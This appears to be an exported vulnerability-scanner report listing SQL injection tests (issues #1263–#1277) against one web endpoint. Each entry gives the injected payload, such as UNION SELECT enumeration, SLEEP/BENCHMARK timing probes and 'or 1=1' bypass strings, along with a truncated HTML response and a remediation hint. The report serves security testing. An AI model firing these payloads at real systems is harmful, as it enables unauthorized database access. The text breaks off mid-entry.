Number #1263\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1264Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1265\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1266\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1267\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1268\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1269\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RANDOMBLOB(500000000/\n2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1270\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1271\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1272\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1273\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1274\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1275\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1276\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 AND (SELECT * FROM Users) =\n1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1277Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> 